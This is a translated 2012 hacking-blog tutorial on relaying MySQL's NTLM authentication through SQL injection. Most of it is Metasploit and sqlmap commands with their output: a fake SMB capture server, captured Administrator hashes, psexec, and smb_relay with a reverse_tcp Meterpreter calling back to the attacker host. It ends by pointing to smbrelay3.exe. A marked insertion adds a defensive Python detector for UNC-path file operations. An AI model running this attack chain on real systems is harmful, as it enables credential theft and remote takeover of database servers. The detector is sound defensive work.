MySQL Database SMBRelay Attack
Source: http://www.dis9.com  Author: brk  Published: 2012-02-14

Hi everyone. Today I'm correcting an article I wrote earlier, "Databases SMBRelay AttAck", which covered the SMBRelay attack against three databases: MySQL, MSSQL and PostgreSQL. The old blog's data was lost, so if anyone saved a copy, please send it to me. (Find a typo and leave a comment: one typo earns one 九区 (Dis9) invite code.)

Back when I covered the MySQL SMBRelay attack, the method was to first get SYSTEM by loading a DLL and only then attack. That is about as bright as the brain-dead "alternative" hackers on 九区, and really dumb: if you already have SYSTEM from the DLL, what is the point of attacking any further...

Now to the main part. If MySQL runs with Administrator privileges, this attack succeeds!

On to the pentest: an injection point, and it has root privileges.

Let's try whether it can read files; root should be able to.

Yep, it can read files. (HELEL the big-shot hacker makes an appearance!)

Next, set up a fake SMB server locally:

msf > use auxiliary/server/capture/smb
msf  auxiliary(smb) > show options 
  
Module options (auxiliary/server/capture/smb):
  
   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte challenge
   JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format
   SRVHOST     0.0.0.0           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     445               yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  
msf  auxiliary(smb) > exploit
[*] Auxiliary module execution completed
  
[*] Server started.
msf  auxiliary(smb) >

Then try reading a share on our own machine.

^_^ Successfully captured the NTLM hash:

NTLMv1 Response Captured from 192.1.1.130:1162
USER:Administrator DOMAIN:DIS9TEAM-B39270 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
LMHASH:be55aab30bf2e1268f57f90887c0d68e2f85252cc731bb25
NTHASH:54b41c2204df7a9e1478f3cfa64bd9e250f57a764a0eef36
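As an added defender-side example (not from the original post), a small detector for the precondition this writeup relies on: a file operation whose path points at a network share, which is what makes the MySQL service account authenticate to the listener and hand over the NTLM response. It scans MySQL general-query-log style lines; the sample lines are constructed, and the detector also catches the same path hidden in a hex literal or written with forward slashes, which the post does not show.

```python
import re

# Constructed sample lines in the style of the MySQL general query log (not
# taken from the page). Line 2 mirrors the LOAD_FILE() read of a UNC share shown
# in the writeup; line 4 hides the same kind of path in a hex literal.
SAMPLE_LOG = [
    r"120109 17:05:06    5 Query  SELECT id, title FROM posts WHERE id = 1",
    r"120109 17:05:07    5 Query  SELECT LOAD_FILE('\\\\192.1.1.1\\share\\file.txt')",
    r"120109 17:05:08    5 Query  SELECT LOAD_FILE('C:\\boot.ini')",
    r"120109 17:05:09    6 Query  SELECT LOAD_FILE(0x5c5c3139322e312e312e315c7368617265)",
    r"120109 17:05:10    6 Query  LOAD DATA INFILE '//192.1.1.1/share/file.txt' INTO TABLE t",
]

# Statements that make the server open a path: LOAD_FILE(), LOAD DATA INFILE,
# SELECT ... INTO OUTFILE/DUMPFILE. The path is a quoted literal (group 1, MySQL
# backslash escapes still doubled) or a hex literal (group 2).
FILE_OP = re.compile(
    r"(?:LOAD_FILE\s*\(\s*|LOAD\s+DATA\s+(?:LOCAL\s+)?INFILE\s+|INTO\s+(?:OUT|DUMP)FILE\s+)"
    r"(?:'((?:[^'\\]|\\.)*)'|(0x[0-9A-Fa-f]+))",
    re.IGNORECASE,
)


def decode_path(quoted, hexlit):
    """Recover the path the server would actually try to open."""
    if hexlit is not None:
        return bytes.fromhex(hexlit[2:]).decode("latin-1")
    # Undo MySQL string escaping: a backslash followed by X becomes X.
    return re.sub(r"\\(.)", r"\1", quoted)


def is_unc(path):
    # Windows accepts both \\host\share and //host/share as network paths.
    p = path.lstrip()
    return p.startswith("\\\\") or p.startswith("//")


def unc_file_refs(log_lines):
    """Return (line_no, path) for each file operation aimed at a network path."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        for m in FILE_OP.finditer(line):
            path = decode_path(m.group(1), m.group(2))
            if is_unc(path):  # the server would authenticate over SMB to this host
                hits.append((n, path))
    return hits


if __name__ == "__main__":
    for n, path in unc_file_refs(SAMPLE_LOG):
        print(f"line {n}: file operation on network path {path}")
```

A hit here means a database account holding the FILE privilege reached for a network path; the matching hardening is to run the MySQL service under a dedicated low-privilege account rather than Administrator and to withhold FILE from the web application's account.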

Now you can use Metasploit's exploit/windows/smb/psexec module, or Nessus's SMB Shell, to get SYSTEM:

msf  exploit(psexec) > exploit 
  
[*] Started reverse handler on 192.1.1.1:1111
[*] Connecting to the server...
[*] Authenticating to 192.1.1.130:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \HgLceCLd.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.130[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.130[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (wZdMvYRY - "MWrLYVvwSxdptGUwjxeJoQYxVEOvvSh")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \HgLceCLd.exe...
[*] Sending stage (752128 bytes) to 192.1.1.130
[*] Meterpreter session 1 opened (192.1.1.1:1111 -> 192.1.1.130:1168) at 2012-01-09 16:56:34 +0800

 

If you find the above too much hassle, you can go with sqlmap. The powerful injection tool sqlmap offers a one-stop service:

brk@Dis9Team:~/t/sqlmap$ sudo ./sqlmap.py -u "http://192.1.1.130/sql/index.php?id=1" --msf-path=/home/brk/t/msf3/ --os-smbrelay
[sudo] password for brk: 
  
    sqlmap/0.9 - automatic SQL injection and database takeover tool
  
http://sqlmap.sourceforge.net
  
[*] starting at: 17:04:54
  
[17:04:54] [INFO] using '/home/brk/t/sqlmap/output/192.1.1.130/session' as session file
[17:04:54] [INFO] testing connection to the target url
[17:04:54] [INFO] testing if the url is stable, wait a few seconds
[17:04:55] [INFO] url is stable
----------------omitted-------------
[17:05:06] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
sqlmap identified the following injection points with a total of 22 HTTP(s) requests:
---
---
  
[17:05:11] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.0.63, PHP 5.2.14
[17:05:11] [WARNING] it is unlikely that this attack will be successful because by default MySQL on Windows runs as Local System which is not a real user, it does not send the NTLM session hash when connecting to a SMB service
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
> 1
which is the local address? [192.1.1.1]
which local port number do you want to use? [50803] 5588
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
which SMB port do you want to use?
[1] 139/TCP
[2] 445/TCP (default)
> 2
[17:06:34] [INFO] running Metasploit Framework 3 console locally, please wait..
  
 [*] Processing /home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt for ERB directives.
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> use windows/smb/smb_relay
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set SRVHOST 192.1.1.1
SRVHOST => 192.1.1.1
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set SRVPORT 445
SRVPORT => 445
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set LPORT 5588
LPORT => 5588
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set LHOST 192.1.1.1
LHOST => 192.1.1.1
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> exploit
[*] Exploit running as background job.
---------------------------------
[*] Started reverse handler on 192.1.1.1:5588
[*] Server started.
[*] Deleting \AaTNBUvw.exe...
[*] Sending Access Denied to 192.1.1.130:1204 DIS9TEAM-B39270\Administrator
[*] Sending stage (752128 bytes) to 192.1.1.130
[*] Meterpreter session 1 opened (192.1.1.1:5588 -> 192.1.1.130:1205) at 2012-01-09 17:06:51 +0800
  
Active sessions
===============
  
  Id  Type                   Information  Connection
  --  ----                   -----------  ----------
  1   meterpreter x86/win32               192.1.1.1:5588 -> 192.1.1.130:1205

 

What if you are on Windows? You can use this tool for the attack: smbrelay3.exe

It offers five attack modes:

* HTTP to SMB: Negotiate authentication with an HTTP client and relay credentials to another smb host.

* SMB to SMB: Negotiate authentication with an SMB computer and relay credentials to another windows computer.

* IMAP to SMB: Negotiate authentication with an email IMAP client and relay credentials to another host.

* POP3 to SMB: Negotiate authentication with an email POP3 client and relay credentials to another host.

* SMTP to SMB: Negotiate authentication with an email SMTP client SMB computer and relay credentials.

You know what to do.


 